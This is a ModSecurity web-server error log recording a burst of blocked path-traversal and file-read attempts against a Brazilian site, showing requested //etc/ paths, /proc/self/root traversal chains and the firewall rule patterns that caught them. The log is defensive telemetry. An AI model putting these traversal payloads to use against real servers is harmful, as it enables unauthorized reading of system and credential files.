[Fri Mar 20 06:53:05.820140 2026] [:error] [pid 9818:tid 140411641214720] [client 57.141.18.45:41026] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZAF1pVZ5mVmJwsFMhXAAAAEw"]
[Fri Mar 20 06:53:06.267102 2026] [:error] [pid 9818:tid 140411624429312] [client 57.141.18.49:41072] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZAl1pVZ5mVmJwsFMhXwAAAE4"]
[Fri Mar 20 06:53:06.607475 2026] [:error] [pid 21219:tid 140411691570944] [client 57.141.18.26:41088] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZAvXLqtnMIWvjpaKMawAAAoY"]
[Fri Mar 20 06:53:07.208052 2026] [:error] [pid 10189:tid 140411641214720] [client 57.141.18.60:41102] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZAzJ3M9BSuKP7CAYK3wAAAIw"]
[Fri Mar 20 06:53:07.558668 2026] [:error] [pid 26799:tid 140411674785536] [client 57.141.18.50:41118] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZA9a6ubjKNq_cu4bFJgAAA0g"]
[Fri Mar 20 06:53:07.707996 2026] [:error] [pid 26799:tid 140411691570944] [client 57.141.18.11:41120] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZA9a6ubjKNq_cu4bFJwAAA0Y"]
[Fri Mar 20 06:53:07.891421 2026] [:error] [pid 21219:tid 140411716749056] [client 57.141.18.96:41126] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZA_XLqtnMIWvjpaKMbAAAAoM"]
[Fri Mar 20 06:53:08.027065 2026] [:error] [pid 9818:tid 140411548894976] [client 57.141.18.41:41132] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZBF1pVZ5mVmJwsFMhYAAAAFc"]
[Fri Mar 20 06:53:09.432716 2026] [:error] [pid 9818:tid 140411582465792] [client 57.141.18.62:41192] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZBV1pVZ5mVmJwsFMhZwAAAFM"]
[Fri Mar 20 06:53:09.965158 2026] [:error] [pid 9818:tid 140411649607424] [client 57.141.18.44:41176] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZBV1pVZ5mVmJwsFMhaAAAAEs"]
[Fri Mar 20 06:53:10.027561 2026] [:error] [pid 21219:tid 140411683178240] [client 57.141.18.53:41204] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZBvXLqtnMIWvjpaKMbQAAAoc"]
[Fri Mar 20 06:53:10.187911 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.243.128:50760] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ZBvqxLDW4GITHUkTW_wAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:53:10.412257 2026] [:error] [pid 26799:tid 140411548894976] [client 57.141.18.31:41210] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZBta6ubjKNq_cu4bFKwAAA1c"]
[Fri Mar 20 06:53:10.679961 2026] [:error] [pid 21219:tid 140411699963648] [client 57.141.18.80:41214] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZBvXLqtnMIWvjpaKMbgAAAoU"]
[Fri Mar 20 06:53:11.142250 2026] [:error] [pid 9818:tid 140411624429312] [client 57.141.18.38:41222] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZB11pVZ5mVmJwsFMhagAAAE4"]
[Fri Mar 20 06:53:11.496060 2026] [:error] [pid 31215:tid 140411607643904] [client 57.141.18.55:41228] [client 57.141.18.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZBwF0L0L-SsrnPo5aUAAAAtA"]
[Fri Mar 20 06:53:12.062774 2026] [:error] [pid 21219:tid 140411733534464] [client 57.141.18.33:41244] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZCPXLqtnMIWvjpaKMcQAAAoE"]
[Fri Mar 20 06:53:12.278402 2026] [:error] [pid 7893:tid 140411741927168] [client 57.141.18.28:41250] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZCBCii7xarUs8iHZZrwAAAgA"]
[Fri Mar 20 06:53:12.819094 2026] [:error] [pid 7893:tid 140411716749056] [client 57.141.18.61:41264] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZCBCii7xarUs8iHZZsAAAAgM"]
[Fri Mar 20 06:53:12.830384 2026] [:error] [pid 31215:tid 140411699963648] [client 57.141.18.74:41266] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZCAF0L0L-SsrnPo5aUQAAAsU"]
[Fri Mar 20 06:53:13.315838 2026] [:error] [pid 10189:tid 140411540502272] [client 57.141.18.33:41278] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZCTJ3M9BSuKP7CAYK4QAAAJg"]
[Fri Mar 20 06:53:13.612574 2026] [:error] [pid 9818:tid 140411691570944] [client 57.141.18.68:41284] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZCV1pVZ5mVmJwsFMhbAAAAEY"]
[Fri Mar 20 06:53:14.163386 2026] [:error] [pid 26799:tid 140411708356352] [client 57.141.18.15:41306] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZCta6ubjKNq_cu4bFLwAAA0Q"]
[Fri Mar 20 06:53:14.423951 2026] [:error] [pid 10189:tid 140411624429312] [client 57.141.18.123:41310] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZCjJ3M9BSuKP7CAYK4gAAAI4"]
[Fri Mar 20 06:53:14.682005 2026] [:error] [pid 31215:tid 140411548894976] [client 57.141.18.66:41314] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZCgF0L0L-SsrnPo5aUgAAAtc"]
[Fri Mar 20 06:53:15.132026 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.243.128:37350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ZC_XLqtnMIWvjpaKMdwAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:53:15.148886 2026] [:error] [pid 31215:tid 140411599251200] [client 57.141.18.87:41324] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZCwF0L0L-SsrnPo5aUwAAAtE"]
[Fri Mar 20 06:53:15.397282 2026] [:error] [pid 11167:tid 140411565680384] [client 57.141.18.31:41340] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZC_HIg5MgXLBnicPq_QAAAdU"]
